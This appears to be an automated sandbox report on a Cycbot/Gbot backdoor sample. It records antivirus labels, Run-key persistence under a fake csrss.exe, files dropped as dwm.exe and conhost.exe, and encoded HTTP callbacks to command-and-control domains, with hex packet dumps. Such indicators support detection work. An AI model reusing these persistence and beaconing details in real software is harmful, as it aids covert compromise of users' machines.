Analysis Date2014-10-09 13:30:19
MD59323bd893cbd2f113359a26b8c1a8ea3
SHA1b851bd47eb817cc23cfcf935f2bb088e6b276844

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 30c6c39418be8d2c2b1711b1838a53e1 sha1: 42f35b905e4e17ad9f1fe4ca6e53db9504667317 size: 169984
Section.rdata md5: 69dbfb0d25bf34419fe8b22ca9d6efe3 sha1: 79005de239f00f97e0e64f7840b361489439f8a0 size: 3584
Section.data md5: c9321aa0c7066032c9b0a527943bbb3c sha1: d78d038c6b4c130711164385b3b447730562480d size: 19456
Section.crt md5: 04e1735ee6621e2b3a336221e0bf9514 sha1: 857e24dd7644d2ec3d421815cd64da126790305d size: 512
Timestamp2005-11-07 01:02:41
VersionPrivateBuild: 1051
PEhash708c3fb3f88ed0694b6381d70e1d85b4dba3658e
IMPhashbee17e79f4f158dbea4e7ec90c73ea50
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)BDS/Gbot.qt.457
AVCA (E-Trust Ino)Win32/Gbot.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Gbot-816
AVDr. WebBackDoor.Gbot.2442
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Cycbot.AD
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Cryptic.CAM
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.qt
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.h
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)no_virus
AVNormanwinpe/Cycbot.BH
AVRisingTrojan.Win32.Generic.1273C660
AVSophosMal/FakeAV-IS
AVSymantecTrojan.Gen.2
AVTrend MicroBKDR_CYCBOT.SMIB
AVVirusBlokAda (vba32)Backdoor.Gbot
AVYara APTno_virus
AVZillya!Backdoor.Gbot.Win32.1319

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSbigspiderwomen.com
Winsock DNSsmallspiderwomen.com
Winsock DNS127.0.0.1
Winsock DNSsharewareconnection.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSsharewareconnection.com
Type: A
216.240.159.81
DNSzonetf.com
Type: A
141.8.225.80
DNSsmallspiderwomen.com
Type: A
DNSbigspiderwomen.com
Type: A
HTTP GEThttp://sharewareconnection.com/images/ubar_1.jpg?tq=gP4aKydXft8Xhg9H30Fqg5xyf7vraX53ANc6uX%2BWU5faTaf2qSBzSEugmu9QH%2BxC%2FnDhk1iuAd56uZwYHz1S%2Ff8bJNEFC%2Fd0MYnT52cFsCRf6G4UW%2BqwuxjKQBOzRCE0vIP41EzFfQvx%2FIASfcn2ojsUDyjD9uuqweD4gEvVjubYFIP6q00K1dejpHJbOrj%2BXDL7BhZc%2BEe8Ttt0%2FvaWdGBeLpKlMjsYrewphB4E57%2FFygiol1gAoGesxAuI%2F7Qg1Y5qIMU0c7HbqJ3%2BltOydH83jz7rueY%2B9Yvm%2Br2Uvr8mDPzeH%2FtTFujmpq74iyKaLHYFLFkM60oOFbfwTUDLombhKO1WjfxdnN%2Fw2EoEE%2BT83UBdQUbCOVtQPHyt5OStYRpNJNKkWwEWijjLIn6f%2FjgcB85lsn3zo7gGKLRU4yDGOvNjBzqMC59rlWSmDRnYd0rBCjF8ytYyDhFOEjyxh%2FKmG8FYH1qCAkSo4AuFMJMEJhVyZdb0icR1rXbjA6JbYydh2IVVNtlinWF5HJr%2BO4aBbPbv2JLKvHVWCjBV%2BC
User-Agent: iamx/3.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNzFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNwlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 216.240.159.81:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 75626172   GET /images/ubar
0x00000010 (00016)   5f312e6a 70673f74 713d6750 34614b79   _1.jpg?tq=gP4aKy
0x00000020 (00032)   64586674 38586867 39483330 46716735   dXft8Xhg9H30Fqg5
0x00000030 (00048)   78796637 76726158 3533414e 63367558   xyf7vraX53ANc6uX
0x00000040 (00064)   25324257 55356661 54616632 7153427a   %2BWU5faTaf2qSBz
0x00000050 (00080)   53457567 6d753951 48253242 78432532   SEugmu9QH%2BxC%2
0x00000060 (00096)   466e4468 6b316975 41643536 755a7759   FnDhk1iuAd56uZwY
0x00000070 (00112)   487a3153 25324666 38624a4e 45464325   Hz1S%2Ff8bJNEFC%
0x00000080 (00128)   32466430 4d596e54 35326346 73435266   2Fd0MYnT52cFsCRf
0x00000090 (00144)   36473455 57253242 71777578 6a4b5142   6G4UW%2BqwuxjKQB
0x000000a0 (00160)   4f7a5243 45307649 50343145 7a466651   OzRCE0vIP41EzFfQ
0x000000b0 (00176)   76782532 46494153 66636e32 6f6a7355   vx%2FIASfcn2ojsU
0x000000c0 (00192)   44796a44 39757571 77654434 67457656   DyjD9uuqweD4gEvV
0x000000d0 (00208)   6a756259 46495036 7130304b 3164656a   jubYFIP6q00K1dej
0x000000e0 (00224)   70484a62 4f726a25 32425844 4c374268   pHJbOrj%2BXDL7Bh
0x000000f0 (00240)   5a632532 42456538 54747430 25324676   Zc%2BEe8Ttt0%2Fv
0x00000100 (00256)   61576447 42654c70 4b6c4d6a 73597265   aWdGBeLpKlMjsYre
0x00000110 (00272)   77706842 34453537 25324646 7967696f   wphB4E57%2FFygio
0x00000120 (00288)   6c316741 6f476573 78417549 25324637   l1gAoGesxAuI%2F7
0x00000130 (00304)   51673159 3571494d 55306337 4862714a   Qg1Y5qIMU0c7HbqJ
0x00000140 (00320)   33253242 6c744f79 64483833 6a7a3772   3%2BltOydH83jz7r
0x00000150 (00336)   75655925 32423959 766d2532 42723255   ueY%2B9Yvm%2Br2U
0x00000160 (00352)   7672386d 44507a65 48253246 74544675   vr8mDPzeH%2FtTFu
0x00000170 (00368)   6a6d7071 37346979 4b614c48 59464c46   jmpq74iyKaLHYFLF
0x00000180 (00384)   6b4d3630 6f4f4662 66775455 444c6f6d   kM60oOFbfwTUDLom
0x00000190 (00400)   62684b4f 31576a66 78646e4e 25324677   bhKO1WjfxdnN%2Fw
0x000001a0 (00416)   32456f45 45253242 54383355 42645155   2EoEE%2BT83UBdQU
0x000001b0 (00432)   62434f56 74515048 7974354f 53745952   bCOVtQPHyt5OStYR
0x000001c0 (00448)   704e4a4e 4b6b5777 4557696a 6a4c496e   pNJNKkWwEWijjLIn
0x000001d0 (00464)   36662532 466a6763 4238356c 736e337a   6f%2FjgcB85lsn3z
0x000001e0 (00480)   6f376747 4b4c5255 34794447 4f764e6a   o7gGKLRU4yDGOvNj
0x000001f0 (00496)   427a714d 43353972 6c57536d 44526e59   BzqMC59rlWSmDRnY
0x00000200 (00512)   64307242 436a4638 79745979 4468464f   d0rBCjF8ytYyDhFO
0x00000210 (00528)   456a7978 68253246 4b6d4738 46594831   Ejyxh%2FKmG8FYH1
0x00000220 (00544)   7143416b 536f3441 75464d4a 4d454a68   qCAkSo4AuFMJMEJh
0x00000230 (00560)   56795a64 62306963 52317258 626a4136   VyZdb0icR1rXbjA6
0x00000240 (00576)   4a625979 64683249 56564e74 6c696e57   JbYydh2IVVNtlinW
0x00000250 (00592)   4635484a 72253242 4f346142 62506276   F5HJr%2BO4aBbPbv
0x00000260 (00608)   324a4c4b 76485657 436a4256 25324243   2JLKvHVWCjBV%2BC
0x00000270 (00624)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x00000280 (00640)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000290 (00656)   73743a20 73686172 65776172 65636f6e   st: sharewarecon
0x000002a0 (00672)   6e656374 696f6e2e 636f6d0d 0a416363   nection.com..Acc
0x000002b0 (00688)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000002c0 (00704)   67656e74 3a206961 6d782f33 2e31310d   gent: iamx/3.11.
0x000002d0 (00720)   0a0d0a                                ...

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a765825 32425039 68253242 49307344   JvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a333220   on: close....32 
0x00000150 (00336)   37313533 34323761 20202025 32425755   7153427a   %2BWU
0x00000160 (00352)   35666154 61663271 53427a0a            5faTaf2qSBz.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a765825 32425039 68253242 49307344   JvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a33 34323761 20202025 32425755   ...3427a   %2BWU
0x00000160 (00352)   35666154 61663271 53427a0a            5faTaf2qSBz.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a765825 32425039 68253242 49307344   JvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a73   OhLgjh8sG%2BcoJs
0x000000c0 (00192)   58253242 534e7a46 4b763937 35586c6d   X%2BSNzFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a59 766d2532 42723255   ose....Yvm%2Br2U
0x00000160 (00352)   7672386d 44507a65 48253246 74544675   vr8mDPzeH%2FtTFu
0x00000170 (00368)   6a6d7071 37346979 4b614c48 59464c46   jmpq74iyKaLHYFLF
0x00000180 (00384)   6b4d3630 6f4f4662 66775455 444c6f6d   kM60oOFbfwTUDLom
0x00000190 (00400)   62684b4f 31576a66 78646e4e 25324677   bhKO1WjfxdnN%2Fw
0x000001a0 (00416)   32456f45 45253242 54383355 42645155   2EoEE%2BT83UBdQU
0x000001b0 (00432)   62434f56 74515048 7974354f 53745952   bCOVtQPHyt5OStYR
0x000001c0 (00448)   704e4a4e 4b6b5777 4557696a 6a4c496e   pNJNKkWwEWijjLIn
0x000001d0 (00464)   36662532 466a6763 4238356c 736e337a   6f%2FjgcB85lsn3z
0x000001e0 (00480)   6f376747 4b4c5255 34794447 4f764e6a   o7gGKLRU4yDGOvNj
0x000001f0 (00496)   427a714d 43353972 6c57536d 44526e59   BzqMC59rlWSmDRnY
0x00000200 (00512)   64307242 436a4638 79745979 4468464f   d0rBCjF8ytYyDhFO
0x00000210 (00528)   456a7978 68253246 4b6d4738 46594831   Ejyxh%2FKmG8FYH1
0x00000220 (00544)   7143416b 536f3441 75464d4a 4d454a68   qCAkSo4AuFMJMEJh
0x00000230 (00560)   56795a64 62306963 52317258 626a4136   VyZdb0icR1rXbjA6
0x00000240 (00576)   4a625979 64683249 56564e74 6c696e57   JbYydh2IVVNtlinW
0x00000250 (00592)   4635484a 72253242 4f346142 62506276   F5HJr%2BO4aBbPbv
0x00000260 (00608)   324a4c4b 76485657 436a4256 25324243   2JLKvHVWCjBV%2BC
0x00000270 (00624)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x00000280 (00640)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000290 (00656)   73743a20 73686172 65776172 65636f6e   st: sharewarecon
0x000002a0 (00672)   6e656374 696f6e2e 636f6d0d 0a416363   nection.com..Acc
0x000002b0 (00688)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000002c0 (00704)   67656e74 3a206961 6d782f33 2e31310d   gent: iamx/3.11.
0x000002d0 (00720)   0a0d0a                                ...

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a765825 32425039 68253242 49307344   JvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a32 37313431 20202054 75787130   ...27141   Tuxq0
0x00000160 (00352)   30734430 4f704c6a 5271410a            0sD0OpLjRqA.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a765825 32425039 68253242 49307344   JvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e776c 4b763937 35586c6d   X%2BSNwlKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a59 766d2532 42723255   ose....Yvm%2Br2U
0x00000160 (00352)   7672386d 44507a65 48253246 74544675   vr8mDPzeH%2FtTFu
0x00000170 (00368)   6a6d7071 37346979 4b614c48 59464c46   jmpq74iyKaLHYFLF
0x00000180 (00384)   6b4d3630 6f4f4662 66775455 444c6f6d   kM60oOFbfwTUDLom
0x00000190 (00400)   62684b4f 31576a66 78646e4e 25324677   bhKO1WjfxdnN%2Fw
0x000001a0 (00416)   32456f45 45253242 54383355 42645155   2EoEE%2BT83UBdQU
0x000001b0 (00432)   62434f56 74515048 7974354f 53745952   bCOVtQPHyt5OStYR
0x000001c0 (00448)   704e4a4e 4b6b5777 4557696a 6a4c496e   pNJNKkWwEWijjLIn
0x000001d0 (00464)   36662532 466a6763 4238356c 736e337a   6f%2FjgcB85lsn3z
0x000001e0 (00480)   6f376747 4b4c5255 34794447 4f764e6a   o7gGKLRU4yDGOvNj
0x000001f0 (00496)   427a714d 43353972 6c57536d 44526e59   BzqMC59rlWSmDRnY
0x00000200 (00512)   64307242 436a4638 79745979 4468464f   d0rBCjF8ytYyDhFO
0x00000210 (00528)   456a7978 68253246 4b6d4738 46594831   Ejyxh%2FKmG8FYH1
0x00000220 (00544)   7143416b 536f3441 75464d4a 4d454a68   qCAkSo4AuFMJMEJh
0x00000230 (00560)   56795a64 62306963 52317258 626a4136   VyZdb0icR1rXbjA6
0x00000240 (00576)   4a625979 64683249 56564e74 6c696e57   JbYydh2IVVNtlinW
0x00000250 (00592)   4635484a 72253242 4f346142 62506276   F5HJr%2BO4aBbPbv
0x00000260 (00608)   324a4c4b 76485657 436a4256 25324243   2JLKvHVWCjBV%2BC
0x00000270 (00624)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x00000280 (00640)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000290 (00656)   73743a20 73686172 65776172 65636f6e   st: sharewarecon
0x000002a0 (00672)   6e656374 696f6e2e 636f6d0d 0a416363   nection.com..Acc
0x000002b0 (00688)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000002c0 (00704)   67656e74 3a206961 6d782f33 2e31310d   gent: iamx/3.11.
0x000002d0 (00720)   0a0d0a                                ...


Strings
.(
.)
..
040904b0
1051
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
-3Td2v
4knTJ9R
^4w;gLkSo
56?.N+
5FjkLOWF
\6'n[a/
_/6[Y9
7@8%x?H
7Uji9{
{	<>\89
8SM5Tj
9Bd-.V*
9KWl( 
ADVAPI32.dll
AlphaBlend
CharLowerA
CharNextA
CharUpperA
CloseHandle
CompareStringA
CompareStringW
CreateFileMappingA
CreateFileW
CreateMutexA
CreateSemaphoreA
CreateThread
cWd}5u
@.data
DeleteCriticalSection
EnterCriticalSection
EnumResourceNamesW
ExitProcess
ExitThread
FileTimeToLocalFileTime
FileTimeToSystemTime
FlushFileBuffers
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
GetACP
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentThreadId
GetDiskFreeSpaceExA
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileType
GetFullPathNameA
GetFullPathNameW
GetKeyState
GetLastError
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetPriorityClass
GetPrivateProfileStringA
GetProcAddress
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemTime
GetTempFileNameA
GetTempPathA
GetTempPathW
GetThreadIOPendingFlag
GetThreadPriority
GetTickCount
GetTimeZoneInformation
GetUserDefaultLCID
GlobalAlloc
GlobalFree
GlobalUnlock
gw9&U7
^.h/\@
_.h`C@
;&HDBS
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
hhLibr
hP.h>X@
%hX<^]
$.hz@@
Hzd*I<)
_+i-59
IKu:6'
IL6\n6
	I./.N
InitializeCriticalSection
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsDBCSLeadByte
iTvy*s
J;9UZ4v
j@.hA<@
j]+vQP
jWF-&kV2
KERNEL32.dll
k_g'=j
K};'ia*
*!&KK@
